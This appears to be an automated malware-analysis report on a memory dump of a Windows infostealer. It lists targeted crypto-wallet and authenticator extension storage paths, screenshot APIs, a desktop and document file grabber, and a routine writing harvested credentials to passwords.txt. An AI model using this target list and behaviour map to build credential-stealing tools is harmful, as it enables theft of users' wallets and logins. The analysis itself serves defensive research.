\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT, xrefs: 004098DA
\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT, xrefs: 0040765F
\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp, xrefs: 00405FE9
\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn, xrefs: 00405DE7
\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec, xrefs: 00409686
\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT, xrefs: 00408CCE
\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT, xrefs: 00409A58
\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai, xrefs: 004066AF
\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT, xrefs: 00408B4C
\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad, xrefs: 00407708
\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp\CURRENT, xrefs: 00405F03
\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb, xrefs: 004082F0
NiftyWallet, xrefs: 0040700F, 00407183
\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT, xrefs: 004092D6
\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb, xrefs: 00407E78
\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT, xrefs: 004089CA
\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT, xrefs: 00408543
\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT, xrefs: 00407957
\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb, xrefs: 00406E28
Authenticator, xrefs: 00406717, 0040689F
\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk, xrefs: 00409DFB
\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao, xrefs: 00409981
\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT, xrefs: 00408848
\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec, xrefs: 00409803
Guarda, xrefs: 004078EF, 00407A6B
\Sync Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb, xrefs: 00406CA3
\Sync Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec, xrefs: 004061EB
Plugins, xrefs: 00406732, 00406737, 00406786, 004068BA, 00406A36, 00406BB2
\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln, xrefs: 00407A00
TronLink, xrefs: 00405C8B, 00406291
\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT, xrefs: 004083C3
\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT, xrefs: 0040A050
BinanceChainWallet, xrefs: 0040608F, 0040659F
\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne, xrefs: 00407FEF
\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj, xrefs: 004088F4
\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb\CURRENT, xrefs: 00407DCF
MetaMask, xrefs: 00405E8D, 00406427
\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk, xrefs: 00409C7D
\Sync Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb, xrefs: 004069B0
\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi, xrefs: 00408467
NeoLine, xrefs: 004099EC, 00409B6A
\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb\CURRENT, xrefs: 00406A83
\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT, xrefs: 00409458
\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENT, xrefs: 00408247
\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln, xrefs: 00407884
\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT, xrefs: 004077DB
Coinbase, xrefs: 004075EB, 00407773
Authy, xrefs: 00406A1B, 00406B97
\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT, xrefs: 00409BD6
\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig, xrefs: 00409382
iWallet, xrefs: 004087E0, 00408962
\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb, xrefs: 00406B2C
\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT, xrefs: 0040678B
RoninWallet, xrefs: 004096F4, 0040986E
\Sync Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec\CURRENT, xrefs: 00406105
\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih, xrefs: 00408A76
SaturnWallet, xrefs: 004093F0, 00409572
\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad, xrefs: 00407583
\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT, xrefs: 0040975C
\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid\CURRENT, xrefs: 00407077, 00407367
\Sync Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb\CURRENT, xrefs: 00406BFF
MathWallet, xrefs: 004072FB, 00407473
\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi, xrefs: 004085EC
\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih, xrefs: 00408BF8
\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm, xrefs: 00408D7A
\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT, xrefs: 00407F4B
\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT, xrefs: 00406305
\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj, xrefs: 00408772
\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn, xrefs: 004063BF
\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT, xrefs: 00408FD2
\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT, xrefs: 004080CB
\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT, xrefs: 00407C53
Yoroi, xrefs: 00406D0B, 00406E93
Wallets, xrefs: 00405CAC, 00405EAE, 004060B0, 004062B2, 00406442, 004065BA, 00406D26, 00406D2B, 00406D7A, 00406EAE, 0040702A, 0040719E, 00407316, 0040748E, 00407606, 0040760B, 0040765A, 0040778E, 0040790A, 00407A86, 00407BFB, 00407D7E, 00407EFA, 00408073, 004081F6, 00408372, 004084EA, 004084EF, 0040853E, 00408672, 004087FB, 0040897D, 00408AFF, 00408C81, 00408E03, 00408F85, 00409107, 00409289, 0040940B, 0040958D, 0040970F, 00409889, 00409A07, 00409B85, 00409D03, 00409E81, 00409FFF, 0040A17D
\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid, xrefs: 0040711B, 0040740B
\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT, xrefs: 0040660B
\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT, xrefs: 004086BF
\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT, xrefs: 00405D01
%s\*, xrefs: 00405A82
\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig, xrefs: 00409504
\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn, xrefs: 00409F79
JaxxLiberty, xrefs: 00408051, 00408056, 004080C6, 004081DF, 0040835B
\Sync Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb\CURRENT, xrefs: 00406907

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Find$File$_sprintf$CloseFirstH_prolog3Next_memmove$Copy__output_l
String ID: %s\%s$%s\*$Authenticator$Authy$BinanceChainWallet$BitAppWallet$CloverWallet$Coinbase$EQUALWallet$Guarda$GuildWallet$JaxxLiberty$LiqualityWallet$MathWallet$MetaMask$MewCx$NeoLine$NiftyWallet$Plugins$RoninWallet$SaturnWallet$TronLink$Wallets$Wombat$Yoroi$\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb$\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb\CURRENT$\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb$\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENT$\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih$\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT$\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai$\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT$\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac$\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT$\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne$\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT$\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao$\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT$\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb$\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb\CURRENT$\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp$\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp\CURRENT$\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi$\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT$\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec$\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT$\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb$\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb\CURRENT$\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad$\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT$\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln$\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT$\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec$\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec\CURRENT$\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid$\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid\CURRENT$\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj$\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT$\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn$\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT$\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj$\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT$\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk$\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT$\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn$\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT$\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig$\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT$\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm$\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT$\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih$\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT$\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai$\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT$\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac$\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT$\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne$\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT$\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao$\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT$\Sync Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb$\Sync Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb\CURRENT$\Sync Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp$\Sync Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp\CURRENT$\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi$\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT$\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec$\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT$\Sync Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb$\Sync Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb\CURRENT$\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad$\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT$\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln$\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT$\Sync Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec$\Sync Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec\CURRENT$\Sync Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid$\Sync Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid\CURRENT$\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj$\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT$\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn$\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT$\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj$\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT$\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk$\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT$\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn$\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT$\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig$\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT$\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm$\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT$iWallet
API String ID: 4158272174-550326695
Opcode ID: 60e90522ae9fd7c494620146cd27bad759983f66338105e88ec45abaed92fda8
Instruction ID: 9311531beb625c380a761595c136ec9607eccc199b401a0f6b90559018a3bef4
Opcode Fuzzy Hash: 60e90522ae9fd7c494620146cd27bad759983f66338105e88ec45abaed92fda8
Instruction Fuzzy Hash: 2CA371B1804288EEDB21EFA5CD55EEE377CAF56308F00016EF909A71D1EA785B04D7A5

Uniqueness

Uniqueness Score: -1.00%

Function 004626E9, Relevance: 131.5, APIs: 55, Strings: 20, Instructions: 242libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 004626F7
GetProcAddress.KERNEL32(00000000), ref: 00462710
GetProcAddress.KERNEL32(00000000), ref: 0046271E
LoadLibraryA.KERNEL32(00000000), ref: 0046272C
LoadLibraryA.KERNEL32 ref: 0046273A
LoadLibraryA.KERNEL32 ref: 00462749
LoadLibraryA.KERNEL32 ref: 00462757
LoadLibraryA.KERNEL32(gdi32.dll), ref: 00462764
LoadLibraryA.KERNEL32(ole32.dll), ref: 00462772
LoadLibraryA.KERNEL32(user32.dll), ref: 00462780
GetProcAddress.KERNEL32(00000000), ref: 00462794
GetProcAddress.KERNEL32(00000000), ref: 004627A6
GetProcAddress.KERNEL32(00000000), ref: 004627B8
GetProcAddress.KERNEL32(00000000), ref: 004627CA
GetProcAddress.KERNEL32(00000000), ref: 004627DC
GetProcAddress.KERNEL32(00000000), ref: 004627EE
GetProcAddress.KERNEL32(00000000), ref: 00462808
GetProcAddress.KERNEL32(00000000), ref: 0046281C
GetProcAddress.KERNEL32(00000000), ref: 00462836
GetProcAddress.KERNEL32(00000000), ref: 00462848
GetProcAddress.KERNEL32(00000000), ref: 0046285A
GetProcAddress.KERNEL32(00000000), ref: 0046286C
GetProcAddress.KERNEL32(00000000), ref: 0046287E
GetProcAddress.KERNEL32(00000000), ref: 00462890
GetProcAddress.KERNEL32(00000000), ref: 004628A2
GetProcAddress.KERNEL32(00000000), ref: 004628B4
GetProcAddress.KERNEL32(00000000), ref: 004628C6
GetProcAddress.KERNEL32(00000000), ref: 004628E0
GetProcAddress.KERNEL32(00000000), ref: 004628F2
GetProcAddress.KERNEL32(00000000), ref: 00462904
GetProcAddress.KERNEL32(00000000), ref: 00462916
GetProcAddress.KERNEL32(00000000), ref: 00462928
GetProcAddress.KERNEL32(00000000), ref: 0046293A
GetProcAddress.KERNEL32(00000000), ref: 0046294C
GetProcAddress.KERNEL32(00000000), ref: 0046295E
GetProcAddress.KERNEL32(00000000), ref: 00462970
GetProcAddress.KERNEL32(00000000), ref: 00462982
GetProcAddress.KERNEL32(00000000), ref: 00462994
GetProcAddress.KERNEL32(?,CreateCompatibleBitmap), ref: 004629AD
GetProcAddress.KERNEL32(?,SelectObject), ref: 004629BE
GetProcAddress.KERNEL32(?,BitBlt), ref: 004629CF
GetProcAddress.KERNEL32(?,DeleteObject), ref: 004629E0
GetProcAddress.KERNEL32(?,CreateDCA), ref: 004629F1
GetProcAddress.KERNEL32(?,GetDeviceCaps), ref: 00462A02
GetProcAddress.KERNEL32(?,CreateCompatibleDC), ref: 00462A13
GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 00462A2C
GetProcAddress.KERNEL32(00000000,CoUninitialize), ref: 00462A3F
GetProcAddress.KERNEL32(00000000,GetDesktopWindow), ref: 00462A5C
GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 00462A70
GetProcAddress.KERNEL32(00000000,GetKeyboardLayoutList), ref: 00462A81
GetProcAddress.KERNEL32(00000000,CharToOemA), ref: 00462A92
GetProcAddress.KERNEL32(00000000,GetDC), ref: 00462AA3
GetProcAddress.KERNEL32(00000000,wsprintfA), ref: 00462AB4
GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 00462AC5
GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 00462AD6

Strings

CreateCompatibleBitmap, xrefs: 004629A7
CreateCompatibleDC, xrefs: 00462A08
DeleteObject, xrefs: 004629D5
GetDesktopWindow, xrefs: 00462A54
gdi32.dll, xrefs: 0046275D
GetDC, xrefs: 00462A98
EnumDisplayDevicesA, xrefs: 00462ABA
GetDeviceCaps, xrefs: 004629F7
ReleaseDC, xrefs: 00462A65
GetSystemMetrics, xrefs: 00462ACB
CoCreateInstance, xrefs: 00462A24
SelectObject, xrefs: 004629B3
BitBlt, xrefs: 004629C4
user32.dll, xrefs: 00462778
CharToOemA, xrefs: 00462A87
wsprintfA, xrefs: 00462AA9
ole32.dll, xrefs: 0046276A
GetKeyboardLayoutList, xrefs: 00462A76
CreateDCA, xrefs: 004629E6
CoUninitialize, xrefs: 00462A32

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: BitBlt$CharToOemA$CoCreateInstance$CoUninitialize$CreateCompatibleBitmap$CreateCompatibleDC$CreateDCA$DeleteObject$EnumDisplayDevicesA$GetDC$GetDesktopWindow$GetDeviceCaps$GetKeyboardLayoutList$GetSystemMetrics$ReleaseDC$SelectObject$gdi32.dll$ole32.dll$user32.dll$wsprintfA
API String ID: 2238633743-2379150429
Opcode ID: 4610417f5ee5d2a52b906526424e16911f9cd2d082fdb5f36bdc21c1e232c309
Instruction ID: de4495144baa1624ac04cb8e555fe1289a9a557f97568fb46aef666f2f6e74dd
Opcode Fuzzy Hash: 4610417f5ee5d2a52b906526424e16911f9cd2d082fdb5f36bdc21c1e232c309
Instruction Fuzzy Hash: AAA16C75841211EFDB019FE6AE889693EB9FB3970171004BBF90292271EBB94412DF5F

Uniqueness

Uniqueness Score: -1.00%

Function 00404F13, Relevance: 56.6, APIs: 31, Strings: 1, Instructions: 602stringfileCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00404F32
_memset.LIBCMT ref: 00404F61
_memset.LIBCMT ref: 00404F74
_memset.LIBCMT ref: 00404F82
_memset.LIBCMT ref: 00404F90
lstrcpyW.KERNEL32 ref: 00404FA0
lstrcatW.KERNEL32(?,\*.*), ref: 00404FB2
FindFirstFileW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000018), ref: 00404FC3
lstrcpyW.KERNEL32 ref: 00404FD6
lstrcatW.KERNEL32(?,00486804), ref: 00404FE9
lstrcatW.KERNEL32(?,?), ref: 00404FFA
lstrcpyW.KERNEL32 ref: 0040500A
lstrcatW.KERNEL32(?,00486804), ref: 0040501E
lstrcatW.KERNEL32(?,?), ref: 0040502B
lstrcmpW.KERNEL32(?,00486800,?,?,?,?,?,?,?,?,?,?,?,00000018), ref: 00405042
lstrcmpW.KERNEL32(?,004867F8,?,?,?,?,?,?,?,?,?,?,?,00000018), ref: 00405055
PathMatchSpecW.SHLWAPI(?,00000000,?,?,00000001,00000000,?), ref: 00405120
PathMatchSpecW.SHLWAPI(?,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040551C

Part of subcall function 00402F8D: _memmove.LIBCMT ref: 00402FAF

Part of subcall function 00460290: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 004602AB

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00405551

Part of subcall function 00461E3A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00461E6B
Part of subcall function 00461E3A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 00461E8E

FindNextFileW.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040567A
FindClose.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000018), ref: 0040568B
_memset.LIBCMT ref: 0040569B
_memset.LIBCMT ref: 004056A9
_memset.LIBCMT ref: 004056B7
_memset.LIBCMT ref: 004056C5
_memset.LIBCMT ref: 00405716
_memset.LIBCMT ref: 00405724
_memset.LIBCMT ref: 00405732
_memset.LIBCMT ref: 00405740
FindClose.KERNEL32(00000008,?,?,?,?,?,?,00000000,?,000003E8,00000000,00000001,00000000), ref: 0040574B

Part of subcall function 00404F13: DeleteFileW.KERNEL32(?,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,?,00000001,00000000), ref: 00405227

Strings

\*.*, xrefs: 00404FA6

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memset$lstrcat$FileFind$lstrcpy$ByteCharCloseMatchMultiPathSpecWidelstrcmp$CreateDeleteFirstH_prolog3NextUnothrow_t@std@@@__ehfuncinfo$??2@_memmove
String ID: \*.*
API String ID: 2798174453-1173974218
Opcode ID: 35613b4611af1d12080f8510816aa7d6db9f6f80026212a40ae3b534614641af
Instruction ID: a9a975aced4b9d9ca6fe8cd0df858cc36f18c231fa796d44566276dd0e8f9028
Opcode Fuzzy Hash: 35613b4611af1d12080f8510816aa7d6db9f6f80026212a40ae3b534614641af
Instruction Fuzzy Hash: BE324B7140028EAEDF21EFA5DC84EEE777CFF54309F14052BE909A6191EB389A44CB19

Uniqueness

Uniqueness Score: -1.00%

Function 0040A5EA, Relevance: 39.3, APIs: 8, Strings: 14, Instructions: 800COMMON

Download Yara Rule

APIs

_strtok.LIBCMT ref: 0040A64E
_strtok.LIBCMT ref: 0040A710

Part of subcall function 00404E80: __EH_prolog3.LIBCMT ref: 00404E87

Part of subcall function 004046B4: _memmove.LIBCMT ref: 004046D6

Part of subcall function 00402CD0: _memmove.LIBCMT ref: 00402CEF

__wgetenv.LIBCMT ref: 0040A876
__wgetenv.LIBCMT ref: 0040A914
GetLogicalDriveStringsA.KERNEL32 ref: 0040AB55
_strtok.LIBCMT ref: 0040AB8A
GetDriveTypeA.KERNEL32(?,00000001,00000000,?,?,?,?,?), ref: 0040ABF0

Part of subcall function 0045F3B7: GetUserNameA.ADVAPI32(?,?), ref: 0045F3EC

Part of subcall function 00462247: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000011,00000000,00000000,000003E8,?,00000000,?,?,?,0040DF45,?,?,?), ref: 00462276
Part of subcall function 00462247: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,0040DF45,?,?,?,?), ref: 004622A5

_strtok.LIBCMT ref: 0040AFC7

Strings

%DRIVE_FIXED%, xrefs: 0040ABF7, 0040AC30
LOCALAPPDATA, xrefs: 0040A90B
%C%, xrefs: 0040AE0B, 0040AE54
C:\, xrefs: 0040AE32
APPDATA, xrefs: 0040A86D
\Desktop, xrefs: 0040A9CB
%DOCUMENTS%, xrefs: 0040AA61, 0040AA66, 0040AA8D
C:\Users\, xrefs: 0040A7A9, 0040A7B1, 0040A833, 0040A9BD, 0040AAA9
.zip, xrefs: 0040AB92
%APPDATA%, xrefs: 0040A839, 0040A83E, 0040A865
%LOCALAPPDATA%, xrefs: 0040A8D7, 0040A8DC, 0040A903
%DESKTOP%, xrefs: 0040A975, 0040A97A, 0040A9A1
%DRIVE_REMOVABLE%, xrefs: 0040AD02, 0040AD39
\Documents, xrefs: 0040AAB7

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _strtok$ByteCharDriveMultiWide__wgetenv_memmove$H_prolog3LogicalNameStringsTypeUser
String ID: %APPDATA%$%C%$%DESKTOP%$%DOCUMENTS%$%DRIVE_FIXED%$%DRIVE_REMOVABLE%$%LOCALAPPDATA%$.zip$APPDATA$C:\$C:\Users\$LOCALAPPDATA$\Desktop$\Documents
API String ID: 1597689408-2603015269
Opcode ID: 632270b4dab062be37ade7027298caa1da4555e4327131859afd6fb9126e7969
Instruction ID: b9d34dd97d4348ad34502de30f085cdaf849ac27cdfa78e59730d2519d3a32bf
Opcode Fuzzy Hash: 632270b4dab062be37ade7027298caa1da4555e4327131859afd6fb9126e7969
Instruction Fuzzy Hash: 1662C871900248EEDB14EFA8C946BEE7B78AF15308F14406EF905A71C2DB795B09C7A7

Uniqueness

Uniqueness Score: -1.00%

Function 00412190, Relevance: 38.7, APIs: 16, Strings: 6, Instructions: 245libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 004121C1
GetProcAddress.KERNEL32(00000000), ref: 004121E2
GetProcAddress.KERNEL32(00000000), ref: 004121F0
GetProcAddress.KERNEL32(00000000), ref: 004121FE
GetProcAddress.KERNEL32(00000000), ref: 0041220C
GetProcAddress.KERNEL32(00000000), ref: 0041221A
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000,00000001,00000000,passwords.txt), ref: 00412329
_fprintf.LIBCMT ref: 0041233A
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 00412357
_fprintf.LIBCMT ref: 00412365
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 00412385
_fprintf.LIBCMT ref: 00412396
_fprintf.LIBCMT ref: 004123C7
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 004123E8
_fprintf.LIBCMT ref: 004123F9
FreeLibrary.KERNEL32(00000000), ref: 00412457

Strings

Host: %s, xrefs: 0041235D
Password: %s, xrefs: 004123F1
Soft: %s, xrefs: 00412332
Password: , xrefs: 004123BF
Login: %s, xrefs: 0041238E
passwords.txt, xrefs: 0041229F

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc_fprintf$ByteCharMultiWide$Library$FreeLoad
String ID: Host: %s$Login: %s$Password: $Password: %s$Soft: %s$passwords.txt
API String ID: 1561987134-3130916318
Opcode ID: e6300e65373c509f9a1ce3e25db0ab6e4eb333436d24830e87314ae1f7d07127
Instruction ID: 4a20572128d85844788989d75c1977480bb766bc5272ee3ee2df8598a28250e5
